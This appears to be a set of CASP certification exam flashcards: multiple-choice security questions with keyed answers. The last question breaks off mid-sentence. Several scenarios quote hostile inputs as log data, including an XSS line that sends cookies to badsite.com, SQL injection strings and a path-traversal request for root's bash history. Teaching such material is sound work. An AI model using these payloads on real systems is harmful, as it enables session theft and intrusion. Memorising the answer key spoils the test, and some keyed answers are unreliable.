CASP Flashcards
An administrator wants to enable policy based flexible mandatory access controls on an open
source OS to prevent abnormal application modifications or executions. Which of the following
would BEST accomplish this?
A. Access control lists
B. SELinux
C. IPtables firewall
D. HIPS
B. SELinux
Company ABC’s SAN is nearing capacity, and will cause costly downtimes if servers run out disk
space. Which of the following is a more cost effective alternative to buying a new SAN?
A. Enable multipath to increase availability
B. Enable deduplication on the storage pools
C. Implement snapshots to reduce virtual disk size
D. Implement replication to offsite datacenter
B. Enable deduplication on the storage pools
A systems administrator establishes a CIFS share on a UNIX device to share data to Windows
systems. The security authentication on the Windows domain is set to the highest level. Windows
users are stating that they cannot authenticate to the UNIX share. Which of the following settings
on the UNIX server would correct this problem?
A. Refuse LM and only accept NTLMv2
B. Accept only LM
C. Refuse NTLMv2 and accept LM
D. Accept only NTLM
A. Refuse LM and only accept NTLMv2
A security architect is designing a new infrastructure using both type 1 and type 2 virtual
machines. In addition to the normal complement of security controls (e.g. antivirus, host
hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store
cryptographic keys used to sign code and code modules on the VMs. Which of the following will
meet this goal without requiring any hardware pass-through implementations?
A. vTPM
B. HSM
C. TPM
D. INE
A. vTPM
A user has a laptop configured with multiple operating system installations. The operating systems
are all installed on a single SSD, but each has its own partition and logical volume. Which of the
following is the BEST way to ensure confidentiality of individual operating system data?
A. Encryption of each individual partition
B. Encryption of the SSD at the file level
C. FDE of each logical volume on the SSD
D. FDE of the entire SSD as a single disk
A. Encryption of each individual partition
After being notified of an issue with the online shopping cart, where customers are able to
arbitrarily change the price of listed items, a programmer analyzes the following piece of code
used by a web based shopping cart.
SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);
The programmer found that every time a user adds an item to the cart, a temporary file is created
on the web server /tmp directory. The temporary file has a name which is generated by
concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DDYYYY,
(e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased. Which
of the following is MOST likely being exploited to manipulate the price of a shopping cart’s items?
A. Input validation
B. SQL injection
C. TOCTOU
D. Session hijacking
C. TOCTOU
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses
deduplication. The single controller in the storage array has failed, so the administrator wants to
move the drives to a storage array from a different manufacturer in order to access the data.
Which of the following issues may potentially occur?
A. The data may not be in a usable format.
B. The new storage array is not FCoE based.
C. The data may need a file system check.
D. The new storage array also only has a single controller.
Answer: A
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser
crashes the browser and then allows him to gain remote code execution in the context of the
victim’s privilege level. The browser crashes due to an exception error when a heap memory that
is unused is accessed. Which of the following BEST describes the application issue?
A. Integer overflow
B. Click-jacking
CompTIA CAS-002 Exam
www.selftestengine.com 4
C. Race condition
D. SQL injection
E. Use after free
F. Input validation
E. Use after free
A developer is determining the best way to improve security within the code being developed. The
developer is focusing on input fields where customers enter their credit card details. Which of the
following techniques, if implemented in the code, would be the MOST effective in protecting the
fields from malformed input?
A. Client side input validation
B. Stored procedure
C. Encrypting credit card details
D. Regular expression matching
D. Regular expression matching
A security administrator was doing a packet capture and noticed a system communicating with an
unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no
IPv6 routing into or out of the network. Which of the following is the BEST course of action?
A. Investigate the network traffic and block UDP port 3544 at the firewall
B. Remove the system from the network and disable IPv6 at the router
C. Locate and remove the unauthorized 6to4 relay from the network
D. Disable the switch port and block the 2001::/32 traffic at the firewall
A. Investigate the network traffic and block UDP port 3544 at the firewall
A security administrator notices the following line in a server’s security log:
document.location=’http://badsite.com/?q=’document.cookie’) + “’;
The administrator is concerned that it will take the developer a lot of time to fix the application that
is running on the server. Which of the following should the security administrator implement to
prevent this particular attack?
A. WAF
B. Input validation
C. SIEM
D. Sandboxing
E. DAM
A. WAF
A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual
machines, this virtual hardware is indistinguishable from real hardware. By implementing
virtualized TPMs, which of the following trusted system concepts can be implemented?
A. Software-based root of trust
B. Continuous chain of trust
C. Chain of trust with a hardware root of trust
D. Software-based trust anchor with no root of trust
C. Chain of trust with a hardware root of trust
An organization is concerned with potential data loss in the event of a disaster, and created a
backup datacenter as a mitigation strategy. The current storage method is a single NAS used by
all servers in both datacenters. Which of the following options increases data availability in the
event of a datacenter failure?
A. Replicate NAS changes to the tape backups at the other datacenter.
B. Ensure each server has two HBAs connected through two routes to the NAS.
C. Establish deduplication across diverse storage paths.
D. Establish a SAN that replicates between datacenters.
D. Establish a SAN that replicates between datacenters.
An application present on the majority of an organization’s 1,000 systems is vulnerable to a buffer
overflow attack. Which of the following is the MOST comprehensive way to resolve the issue?
A. Deploy custom HIPS signatures to detect and block the attacks.
B. Validate and deploy the appropriate patch.
C. Run the application in terminal services to reduce the threat landscape.
D. Deploy custom NIPS signatures to detect and block the attacks.
B. Validate and deploy the appropriate patch.
select id, firstname, lastname from authors User input= firstname= Hack;man lastname=Johnson Which of the following types of attacks is the user attempting? A. XML injection B. Command injection C. Cross-site scripting D. SQL injection
D. SQL injection
A government agency considers confidentiality to be of utmost importance and availability issues
to be of least importance. Knowing this, which of the following correctly orders various
vulnerabilities in the order of MOST important to LEAST important?
A. Insecure direct object references, CSRF, Smurf
B. Privilege escalation, Application DoS, Buffer overflow
C. SQL injection, Resource exhaustion, Privilege escalation
D. CSRF, Fault injection, Memory leaks
A. Insecure direct object references, CSRF, Smurf
A security administrator wants to deploy a dedicated storage solution which is inexpensive, can
natively integrate with AD, allows files to be selectively encrypted and is suitable for a small
number of users at a satellite office. Which of the following would BEST meet the requirement?
A. SAN
B. NAS
C. Virtual SAN
D. Virtual storage
B. NAS
At 9:00 am each morning, all of the virtual desktops in a VDI implementation become extremely
slow and/or unresponsive. The outage lasts for around 10 minutes, after which everything runs
properly again. The administrator has traced the problem to a lab of thin clients that are all booted
at 9:00 am each morning. Which of the following is the MOST likely cause of the problem and the
BEST solution? (Select TWO).
A. Add guests with more memory to increase capacity of the infrastructure.
B. A backup is running on the thin clients at 9am every morning.
C. Install more memory in the thin clients to handle the increased load while booting.
D. Booting all the lab desktops at the same time is creating excessive I/O.
E. Install 10-Gb uplinks between the hosts and the lab to increase network capacity.
F. Install faster SSD drives in the storage system used in the infrastructure.
CompTIA CAS-002 Exam
www.selftestengine.com 8
G. The lab desktops are saturating the network while booting.
H. The lab desktops are using more memory than is available to the host systems.
D. Booting all the lab desktops at the same time is creating excessive I/O.
F. Install faster SSD drives in the storage system used in the infrastructure.
A security administrator is shown the following log excerpt from a Unix system:
2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914
ssh2
2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915
ssh2
2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916
ssh2
2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port 37918
ssh2
2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port 37920
ssh2
2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924
ssh2
Which of the following is the MOST likely explanation of what is occurring and the BEST
immediate response? (Select TWO).
A. An authorized administrator has logged into the root account remotely.
B. The administrator should disable remote root logins.
C. Isolate the system immediately and begin forensic analysis on the host.
D. A remote attacker has compromised the root account using a buffer overflow in sshd.
E. A remote attacker has guessed the root password using a dictionary attack.
F. Use iptables to immediately DROP connections from the IP 198.51.100.23.
G. A remote attacker has compromised the private key of the root account.
H. Change the root password immediately to a password not found in a dictionary.
C. Isolate the system immediately and begin forensic analysis on the host.
E. A remote attacker has guessed the root password using a dictionary attack.
A security administrator wants to prevent sensitive data residing on corporate laptops and
desktops from leaking outside of the corporate network. The company has already implemented
full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Which of
the following additional controls MUST be implemented to minimize the risk of data leakage?
(Select TWO).
A. A full-system backup should be implemented to a third-party provider with strong encryption for
data in transit.
B. A DLP gateway should be installed at the company border.
C. Strong authentication should be implemented via external biometric devices.
D. Full-tunnel VPN should be required for all network communication.
E. Full-drive file hashing should be implemented with hashes stored on separate storage.
F. Split-tunnel VPN should be enforced when transferring sensitive data.
B. A DLP gateway should be installed at the company border.
D. Full-tunnel VPN should be required for all network communication.
A developer has implemented a piece of client-side JavaScript code to sanitize a user’s provided
input to a web page login screen. The code ensures that only the upper case and lower case
letters are entered in the username field, and that only a 6-digit PIN is entered in the password
field. A security administrator is concerned with the following web server log:
10.235.62.11 – - [02/Mar/2014:06:13:04] “GET
/site/script.php?user=admin&pass=pass%20or%201=1 HTTP/1.1” 200 5724
Given this log, which of the following is the security administrator concerned with and which fix
should be implemented by the developer?
A. The security administrator is concerned with nonprintable characters being used to gain
administrative access, and the developer should strip all nonprintable characters.
B. The security administrator is concerned with XSS, and the developer should normalize Unicode
characters on the browser side.
C. The security administrator is concerned with SQL injection, and the developer should
implement server side input validation.
D. The security administrator is concerned that someone may log on as the administrator, and the
developer should ensure strong passwords are enforced.
C. The security administrator is concerned with SQL injection, and the developer should
implement server side input validation.
The security administrator finds unauthorized tables and records, which were not present before,
on a Linux database server. The database server communicates only with one web server, which
connects to the database server via an account with SELECT only privileges. Web server logs
show the following:
90.76.165.40 – - [08/Mar/2014:10:54:04] “GET calendar.php?create%20table%20hidden
HTTP/1.1” 200 5724
90.76.165.40 – - [08/Mar/2014:10:54:05] “GET ../../../root/.bash_history HTTP/1.1” 200 5724
90.76.165.40 – - [08/Mar/2014:10:54:04] “GET index.php?user=Create HTTP/1.1”
200 5724
The security administrator also inspects the following file system locations on the database server
using the command ‘ls -al /root’
drwxrwxrwx 11 root root 4096 Sep 28 22:45 .
drwxr-xr-x 25 root root 4096 Mar 8 09:30 ..
-rws—— 25 root root 4096 Mar 8 09:30 .bash_history
-rw——- 25 root root 4096 Mar 8 09:30 .bash_history
-rw——- 25 root root 4096 Mar 8 09:30 .profile
-rw——- 25 root root 4096 Mar 8 09:30 .ssh
Which of the following attacks was used to compromise the database server and what can the
security administrator implement to detect such attacks in the future? (Select TWO).
A. Privilege escalation
B. Brute force attack
C. SQL injection
D. Cross-site scripting
E. Using input validation, ensure the following characters are sanitized: <>
F. Update crontab with: find / ( -perm -4000 ) –type f –print0 | xargs -0 ls –l | email.sh
G. Implement the following PHP directive: $clean_user_input = addslashes($user_input)
H. Set an account lockout policy
A. Privilege escalation
F. Update crontab with: find / ( -perm -4000 ) –type f –print0 | xargs -0 ls –l | email.sh
The risk manager has requested a security solution that is centrally managed, can easily be
updated, and protects end users’ workstations from both known and unknown malicious attacks
when connected to either the office or home network. Which of the following would BEST meet
this requirement?
A. HIPS
B. UTM
C. Antivirus
D. NIPS
E. DLP
A. HIPS
Which of the following describes a risk and mitigation associated with cloud data storage?
A. Risk: Shared hardware caused data leakage
Mitigation: Strong encryption at rest
B. Risk: Offsite replication
Mitigation: Multi-site backups
C. Risk: Data loss from de-duplication
Mitigation: Dynamic host bus addressing
D. Risk: Combined data archiving
Mitigation: Two-factor administrator authentication
A. Risk: Shared hardware caused data leakage
Mitigation: Strong encryption at rest
An insurance company is looking to purchase a smaller company in another country. Which of the
following tasks would the security administrator perform as part of the security due diligence?
A. Review switch and router configurations
B. Review the security policies and standards
C. Perform a network penetration test
D. Review the firewall rule set and IPS logs
B. Review the security policies and standards
A new piece of ransomware got installed on a company’s backup server which encrypted the hard
drives containing the OS and backup application configuration but did not affect the deduplication
data hard drives. During the incident response, the company finds that all backup tapes for this
server are also corrupt. Which of the following is the PRIMARY concern?
A. Determining how to install HIPS across all server platforms to prevent future incidents
B. Preventing the ransomware from re-infecting the server upon restore
C. Validating the integrity of the deduplicated data
D. Restoring the data will be difficult without the application configuration
D. Restoring the data will be difficult without the application configuration
The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce
business costs by outsourcing to a third party company in another country. Functions to be
outsourced include: business analysts, testing, software development and back office functions
that deal with the processing of customer data. The Chief Risk Officer (CRO) is concerned about
the outsourcing plans. Which of the following risks are MOST likely to occur if adequate controls
are not implemented?
A. Geographical regulation issues, loss of intellectual property and interoperability agreement
issues
B. Improper handling of client data, interoperability agreement issues and regulatory issues
C. Cultural differences, increased cost of doing business and divestiture issues
D. Improper handling of customer data, loss of intellectual property and reputation damage
D. Improper handling of customer data, loss of intellectual property and reputation damage
A security analyst has been asked to develop a quantitative risk analysis and risk assessment for
the company’s online shopping application. Based on heuristic information from the Security
Operations Center (SOC), a Denial of Service Attack (DoS) has been successfully executed 5
times a year. The Business Operations department has determined the loss associated to each
attack is $40,000. After implementing application caching, the number of DoS attacks was reduced
to one time a year. The cost of the countermeasures was $100,000. Which of the following is the
monetary value earned during the first year of operation?
A. $60,000
B. $100,000
C. $140,000
D. $200,000
A. $60,000
The Information Security Officer (ISO) is reviewing new policies that have been recently made
effective and now apply to the company. Upon review, the ISO identifies a new requirement to
implement two-factor authentication on the company’s wireless system. Due to budget constraints,
the company will be unable to implement the requirement for the next two years. The ISO is
required to submit a policy exception form to the Chief Information Officer (CIO). Which of the
following are MOST important to include when submitting the exception form? (Select THREE).
A. Business or technical justification for not implementing the requirements.
B. Risks associated with the inability to implement the requirements.
C. Industry best practices with respect to the technical implementation of the current controls.
D. All sections of the policy that may justify non-implementation of the requirements.
E. A revised DRP and COOP plan to the exception form.
F. Internal procedures that may justify a budget submission to implement the new requirement.
G. Current and planned controls to mitigate the risks.
A. Business or technical justification for not implementing the requirements.
B. Risks associated with the inability to implement the requirements.
G. Current and planned controls to mitigate the risks.
The Chief Information Officer (CIO) is reviewing the IT centric BIA and RA documentation. The
documentation shows that a single 24 hours downtime in a critical business function will cost the
business $2.3 million. Additionally, the business unit which depends on the critical business
function has determined that there is a high probability that a threat will materialize based on
historical data. The CIO’s budget does not allow for full system hardware replacement in case of a
catastrophic failure, nor does it allow for the purchase of additional compensating controls. Which
of the following should the CIO recommend to the finance director to minimize financial loss?
A. The company should mitigate the risk.
B. The company should transfer the risk.
C. The company should avoid the risk.
D. The company should accept the risk.
B. The company should transfer the risk.
A company is in the process of outsourcing its customer relationship management system to a
cloud provider. It will host the entire organization’s customer database. The database will be
accessed by both the company’s users and its customers. The procurement department has
asked what security activities must be performed for the deal to proceed. Which of the following
are the MOST appropriate security activities to be performed as part of due diligence? (Select
TWO).
A. Physical penetration test of the datacenter to ensure there are appropriate controls.
B. Penetration testing of the solution to ensure that the customer data is well protected.
C. Security clauses are implemented into the contract such as the right to audit.
D. Review of the organizations security policies, procedures and relevant hosting certifications.
E. Code review of the solution to ensure that there are no back doors located in the software.
C. Security clauses are implemented into the contract such as the right to audit.
D. Review of the organizations security policies, procedures and relevant hosting certifications.
An organization is selecting a SaaS provider to replace its legacy, in house Customer Resource
Management (CRM) application. Which of the following ensures the organization mitigates the risk
of managing separate user credentials?
A. Ensure the SaaS provider supports dual factor authentication.
B. Ensure the SaaS provider supports encrypted password transmission and storage.
C. Ensure the SaaS provider supports secure hash file exchange.
D. Ensure the SaaS provider supports role-based access control.
E. Ensure the SaaS provider supports directory services federation.
E. Ensure the SaaS provider supports directory services federation.
After a security incident, an administrator would like to implement policies that would help reduce
fraud and the potential for collusion between employees. Which of the following would help meet
these goals by having co-workers occasionally audit another worker’s position?
A. Least privilege
B. Job rotation
C. Mandatory vacation
D. Separation of duties
B. Job rotation
A large organization has recently suffered a massive credit card breach. During the months of
Incident Response, there were multiple attempts to assign blame for whose fault it was that the
incident occurred. In which part of the incident response phase would this be addressed in a
controlled and productive manner?
A. During the Identification Phase
B. During the Lessons Learned phase
C. During the Containment Phase
D. During the Preparation Phase
B. During the Lessons Learned phase
A security manager for a service provider has approved two vendors for connections to the service
provider backbone. One vendor will be providing authentication services for its payment card
service, and the other vendor will be providing maintenance to the service provider infrastructure
sites. Which of the following business agreements is MOST relevant to the vendors and service
provider’s relationship?
A. Memorandum of Agreement
B. Interconnection Security Agreement
C. Non-Disclosure Agreement
D. Operating Level Agreement
B. Interconnection Security Agreement
A large enterprise acquires another company which uses antivirus from a different vendor. The
CISO has requested that data feeds from the two different antivirus platforms be combined in a
way that allows management to assess and rate the overall effectiveness of antivirus across the
entire organization. Which of the following tools can BEST meet the CISO’s requirement?
A. GRC
B. IPS
C. CMDB
D. Syslog-ng
E. IDS
A. GRC
Which of the following provides the BEST risk calculation methodology?
A. Annual Loss Expectancy (ALE) x Value of Asset
B. Potential Loss x Event Probability x Control Failure Probability
C. Impact x Threat x Vulnerability
D. Risk Likelihood x Annual Loss Expectancy (ALE)
B. Potential Loss x Event Probability x Control Failure Probability
A security policy states that all applications on the network must have a password length of eight
characters. There are three legacy applications on the network that cannot meet this policy. One
system will be upgraded in six months, and two are not expected to be upgraded or removed from
the network. Which of the following processes should be followed?
A. Establish a risk matrix
B. Inherit the risk for six months
C. Provide a business justification to avoid the risk
D. Provide a business justification for a risk exception
D. Provide a business justification for a risk exception
The senior security administrator wants to redesign the company DMZ to minimize the risks
associated with both external and internal threats. The DMZ design must support security in depth,
change management and configuration processes, and support incident reconstruction. Which of
the following designs BEST supports the given requirements?
A. A dual firewall DMZ with remote logging where each firewall is managed by a separate
administrator.
B. A single firewall DMZ where each firewall interface is managed by a separate administrator and
logging to the cloud.
C. A SaaS based firewall which logs to the company’s local storage via SSL, and is managed by
the change control team.
D. A virtualized firewall, where each virtual instance is managed by a separate administrator and
logging to the same hardware.
A. A dual firewall DMZ with remote logging where each firewall is managed by a separate
administrator.
A large hospital has implemented BYOD to allow doctors and specialists the ability to access
patient medical records on their tablets. The doctors and specialists access patient records over
the hospital’s guest WiFi network which is isolated from the internal network with appropriate
security controls. The patient records management system can be accessed from the guest
network and requires two factor authentication. Using a remote desktop type interface, the doctors
and specialists can interact with the hospital’s system. Cut and paste and printing functions are
disabled to prevent the copying of data to BYOD devices. Which of the following are of MOST
concern? (Select TWO).
A. Privacy could be compromised as patient records can be viewed in uncontrolled areas.
B. Device encryption has not been enabled and will result in a greater likelihood of data loss.
C. The guest WiFi may be exploited allowing non-authorized individuals access to confidential
patient data.
D. Malware may be on BYOD devices which can extract data via key logging and screen scrapes.
E. Remote wiping of devices should be enabled to ensure any lost device is rendered inoperable.
A. Privacy could be compromised as patient records can be viewed in uncontrolled areas.
D. Malware may be on BYOD devices which can extract data via key logging and screen scrapes.
The Chief Information Security Officer (CISO) at a company knows that many users store
business documents on public cloud-based storage, and realizes this is a risk to the company. In
response, the CISO implements a mandatory training course in which all employees are instructed
on the proper use of cloud-based storage. Which of the following risk strategies did the CISO
implement?
A. Avoid
B. Accept
C. Mitigate
D. Transfer
C. Mitigate
A forensic analyst receives a hard drive containing malware quarantined by the antivirus
application. After creating an image and determining the directory location of the malware file,
which of the following helps to determine when the system became infected?
A. The malware file’s modify, access, change time properties.
B. The timeline analysis of the file system.
C. The time stamp of the malware in the swap file.
D. The date/time stamp of the malware detection in the antivirus logs.
B. The timeline analysis of the file system.
The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the
Chief Security Officer’s (CSO) request to harden the corporate network’s perimeter. The CEO
argues that the company cannot protect its employees at home, so the risk at work is no different.
Which of the following BEST explains why this company should proceed with protecting its
corporate network boundary?
A. The corporate network is the only network that is audited by regulators and customers.
B. The aggregation of employees on a corporate network makes it a more valuable target for
attackers.
C. Home networks are unknown to attackers and less likely to be targeted directly.
D. Employees are more likely to be using personal computers for general web browsing when they
are at home.
B. The aggregation of employees on a corporate network makes it a more valuable target for
attackers.
A security officer is leading a lessons learned meeting. Which of the following should be
components of that meeting? (Select TWO).
A. Demonstration of IPS system
B. Review vendor selection process
C. Calculate the ALE for the event
D. Discussion of event timeline
E. Assigning of follow up items
D. Discussion of event timeline
E. Assigning of follow up items
An assessor identifies automated methods for identifying security control compliance through
validating sensors at the endpoint and at Tier 2. Which of the following practices satisfy continuous
monitoring of authorized information systems?
A. Independent verification and validation
B. Security test and evaluation
C. Risk assessment
D. Ongoing authorization
D. Ongoing authorization
The source workstation image for new accounting PCs has begun blue-screening. A technician
notices that the date/time stamp of the image source appears to have changed. The desktop
support director has asked the Information Security department to determine if any changes were
made to the source image. Which of the following methods would BEST help with this process?
(Select TWO).
A. Retrieve source system image from backup and run file comparison analysis on the two
images.
B. Parse all images to determine if extra data is hidden using steganography.
C. Calculate a new hash and compare it with the previously captured image hash.
D. Ask desktop support if any changes to the images were made.
E. Check key system files to see if date/time stamp is in the past six months.
A. Retrieve source system image from backup and run file comparison analysis on the two
images.
C. Calculate a new hash and compare it with the previously captured image hash.
A software project manager has been provided with a requirement from the customer to place
limits on the types of transactions a given user can initiate without external interaction from
another user with elevated privileges. This requirement is BEST described as an implementation
of:
A. an administrative control
B. dual control
C. separation of duties
D. least privilege
E. collusion
C. separation of duties
The technology steering committee is struggling with increased requirements stemming from an
increase in telecommuting. The organization has not addressed telecommuting in the past. The
implementation of a new SSL-VPN and a VOIP phone solution enables personnel to work from
remote locations with corporate assets. Which of the following steps must the committee take
FIRST to outline senior management’s directives?
A. Develop an information classification scheme that will properly secure data on corporate
systems.
B. Implement database views and constrained interfaces so remote users will be unable to access
PII from personal equipment.
C. Publish a policy that addresses the security requirements for working remotely with company
equipment.
D. Work with mid-level managers to identify and document the proper procedures for
telecommuting.
C. Publish a policy that addresses the security requirements for working remotely with company
equipment.
A company is facing penalties for failing to effectively comply with e-discovery requests. Which of
the following could reduce the overall risk to the company from this issue?
A. Establish a policy that only allows filesystem encryption and disallows the use of individual file
encryption.
B. Require each user to log passwords used for file encryption to a decentralized repository.
C. Permit users to only encrypt individual files using their domain password and archive all old
user passwords.
D. Allow encryption only by tools that use public keys from the existing escrowed corporate PKI.
D. Allow encryption only by tools that use public keys from the existing escrowed corporate PKI.
There have been some failures of the company’s internal facing website. A security engineer has
found the WAF to be the root cause of the failures. System logs show that the WAF has been
unavailable for 14 hours over the past month, in four separate situations. One of these situations
was a two hour scheduled maintenance time, aimed at improving the stability of the WAF. Using
the MTTR based on the last month’s performance figures, which of the following calculations is the
percentage of uptime assuming there were 722 hours in the month?
A. 92.24 percent
B. 98.06 percent
C. 98.34 percent
D. 99.72 percent
C. 98.34 percent
A security firm is writing a response to an RFP from a customer that is building a new network
based software product. The firm’s expertise is in penetration testing corporate networks. The RFP
explicitly calls for all possible behaviors of the product to be tested, however, it does not specify
any particular method to achieve this goal. Which of the following should be used to ensure the
security and functionality of the product? (Select TWO).
A. Code review
B. Penetration testing
C. Grey box testing
D. Code signing
E. White box testing
A. Code review
E. White box testing
Company XYZ has purchased and is now deploying a new HTML5 application. The company
wants to hire a penetration tester to evaluate the security of the client and server components of
the proprietary web application before launch. Which of the following is the penetration tester
MOST likely to use while performing black box testing of the security of the company’s purchased
application? (Select TWO).
A. Code review
B. Sandbox
C. Local proxy
D. Fuzzer
E. Port scanner
C. Local proxy
D. Fuzzer
The Information Security Officer (ISO) believes that the company has been targeted by
cybercriminals and it is under a cyber attack. Internal services that are normally available to the
public via the Internet are inaccessible, and employees in the office are unable to browse the
Internet. The senior security engineer starts by reviewing the bandwidth at the border router, and
notices that the incoming bandwidth on the router’s external interface is maxed out. The security
engineer then inspects the following piece of log to try and determine the reason for the downtime,
focusing on the company’s external router’s IP which is 128.20.176.19:
11:16:22.110343 IP 90.237.31.27.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110351 IP 23.27.112.200.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110358 IP 192.200.132.213.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110402 IP 70.192.2.55.19 > 128.20.176.19.19: UDP, length 1400
11:16:22.110406 IP 112.201.7.39.19 > 128.20.176.19.19: UDP, length 1400
Which of the following describes the findings the senior security engineer should report to the ISO
and the BEST solution for service restoration?
A. After the senior engineer used a network analyzer to identify an active Fraggle attack, the
company’s ISP should be contacted and instructed to block the malicious packets.
B. After the senior engineer used the above IPS logs to detect the ongoing DDOS attack, an IPS
filter should be enabled to block the attack and restore communication.
C. After the senior engineer used a mirror port to capture the ongoing amplification attack, a BGP
sinkhole should be configured to drop traffic at the source networks.
D. After the senior engineer used a packet capture to identify an active Smurf attack, an ACL
should be placed on the company’s external router to block incoming UDP port 19 traffic.
A. After the senior engineer used a network analyzer to identify an active Fraggle attack, the
company’s ISP should be contacted and instructed to block the malicious packets.
An external penetration tester compromised one of the client organization’s authentication servers
and retrieved the password database. Which of the following methods allows the penetration
tester to MOST efficiently use any obtained administrative credentials on the client organization’s
other systems, without impacting the integrity of any of the systems?
A. Use the pass the hash technique
B. Use rainbow tables to crack the passwords
C. Use the existing access to change the password
D. Use social engineering to obtain the actual password
A. Use the pass the hash technique
A web services company is planning a one-time high-profile event to be hosted on the corporate
website. An outage, due to an attack, would be publicly embarrassing, so Joe, the Chief Executive
Officer (CEO), has requested that his security engineers put temporary preventive controls in
place. Which of the following would MOST appropriately address Joe’s concerns?
A. Ensure web services hosting the event use TCP cookies and deny_hosts.
B. Configure an intrusion prevention system that blocks IPs after detecting too many incomplete
sessions.
C. Contract and configure scrubbing services with third-party DDoS mitigation providers.
D. Purchase additional bandwidth from the company’s Internet service provider.
C. Contract and configure scrubbing services with third-party DDoS mitigation providers.
The Chief Executive Officer (CEO) of an Internet service provider (ISP) has decided to limit the
company’s contribution to worldwide Distributed Denial of Service (DDoS) attacks. Which of the
following should the ISP implement? (Select TWO).
A. Block traffic from the ISP’s networks destined for blacklisted IPs.
B. Prevent the ISP’s customers from querying DNS servers other than those hosted by the ISP.
C. Scan the ISP’s customer networks using an up-to-date vulnerability scanner.
D. Notify customers when services they run are involved in an attack.
E. Block traffic with an IP source not allocated to customers from exiting the ISP’s network.
D. Notify customers when services they run are involved in an attack.
E. Block traffic with an IP source not allocated to customers from exiting the ISP’s network.
Due to compliance regulations, a company requires a yearly penetration test. The Chief
Information Security Officer (CISO) has asked that it be done under a black box methodology.
Which of the following would be the advantage of conducting this kind of penetration test?
A. The risk of unplanned server outages is reduced.
B. Using documentation provided to them, the pen-test organization can quickly determine areas
to focus on.
C. The results will show an in-depth view of the network and should help pin-point areas of internal
weakness.
D. The results should reflect what attackers may be able to learn about the company.
D. The results should reflect what attackers may be able to learn about the company.
Ann, a systems engineer, is working to identify an unknown node on the corporate network. To
begin her investigative work, she runs the following nmap command string:
user@hostname:~$ sudo nmap –O 192.168.1.54
Based on the output, nmap is unable to identify the OS running on the node, but the following
ports are open on the device:
TCP/22
TCP/111
TCP/512-514
TCP/2049
TCP/32778
Based on this information, which of the following operating systems is MOST likely running on the
unknown node?
A. Linux
B. Windows
C. Solaris
D. OSX
C. Solaris
A security engineer is responsible for monitoring company applications for known vulnerabilities.
Which of the following is a way to stay current on exploits and information security news?
A. Update company policies and procedures
B. Subscribe to security mailing lists
C. Implement security awareness training
D. Ensure that the organization vulnerability management plan is up-to-date
B. Subscribe to security mailing lists
The Chief Executive Officer (CEO) of a small start-up company wants to set up offices around the
country for the sales staff to generate business. The company needs an effective communication
solution to remain in constant contact with each other, while maintaining a secure business
environment. A junior-level administrator suggests that the company and the sales staff stay
connected via free social media. Which of the following decisions is BEST for the CEO to make?
A. Social media is an effective solution because it is easily adaptable to new situations.
B. Social media is an ineffective solution because the policy may not align with the business.
C. Social media is an effective solution because it implements SSL encryption.
D. Social media is an ineffective solution because it is not primarily intended for business
applications.
B. Social media is an ineffective solution because the policy may not align with the business.
News outlets are beginning to report on a number of retail establishments that are experiencing
payment card data breaches. The data exfiltration is enabled by malware on a compromised
computer. After the initial exploit, network mapping and fingerprinting is conducted to prepare for
further exploitation. Which of the following is the MOST effective solution to protect against
unrecognized malware infections?
A. Remove local admin permissions from all users and change anti-virus to a cloud aware, push
technology.
B. Implement an application whitelist at all levels of the organization.
C. Deploy a network based heuristic IDS, configure all layer 3 switches to feed data to the IDS for
more effective monitoring.
D. Update router configuration to pass all network traffic through a new proxy server with
advanced malware detection.
B. Implement an application whitelist at all levels of the organization.
A security administrator notices a recent increase in workstations becoming compromised by
malware. Often, the malware is delivered via drive-by downloads, from malware hosting websites,
and is not being detected by the corporate antivirus. Which of the following solutions would
provide the BEST protection for the company?
A. Increase the frequency of antivirus downloads and install updates to all workstations.
B. Deploy a cloud-based content filter and enable the appropriate category to prevent further
infections.
C. Deploy a WAF to inspect and block all web traffic which may contain malware and exploits.
D. Deploy a web based gateway antivirus server to intercept viruses before they enter the
network.
B. Deploy a cloud-based content filter and enable the appropriate category to prevent further
infections.
A security administrator wants to calculate the ROI of a security design which includes the
purchase of new equipment. The equipment costs $50,000 and it will take 50 hours to install and
configure the equipment. The administrator plans to hire a contractor at a rate of $100/hour to do
the installation. Given that the new design and equipment will allow the company to increase
revenue and make an additional $100,000 on the first year, which of the following is the ROI
expressed as a percentage for the first year?
A. -45 percent
B. 5.5 percent
C. 45 percent
D. 82 percent
D. 82 percent
A new internal network segmentation solution will be implemented into the enterprise that consists
of 200 internal firewalls. As part of running a pilot exercise, it was determined that it takes three
changes to deploy a new application onto the network before it is operational. Security now has a
significant effect on overall availability. Which of the following would be the FIRST process to
perform as a result of these findings?
A. Lower the SLA to a more tolerable level and perform a risk assessment to see if the solution
could be met by another solution. Reuse the firewall infrastructure on other projects.
B. Perform a cost benefit analysis and implement the solution as it stands as long as the risks are
understood by the business owners around the availability issues. Decrease the current SLA
expectations to match the new solution.
C. Engage internal auditors to perform a review of the project to determine why and how the
project did not meet the security requirements. As part of the review ask them to review the control
effectiveness.
D. Review to determine if control effectiveness is in line with the complexity of the solution.
Determine if the requirements can be met with a simpler solution.
D. Review to determine if control effectiveness is in line with the complexity of the solution.
Determine if the requirements can be met with a simpler solution.
A Chief Financial Officer (CFO) has raised concerns with the Chief Information Security Officer
(CISO) because money has been spent on IT security infrastructure, but corporate assets are still
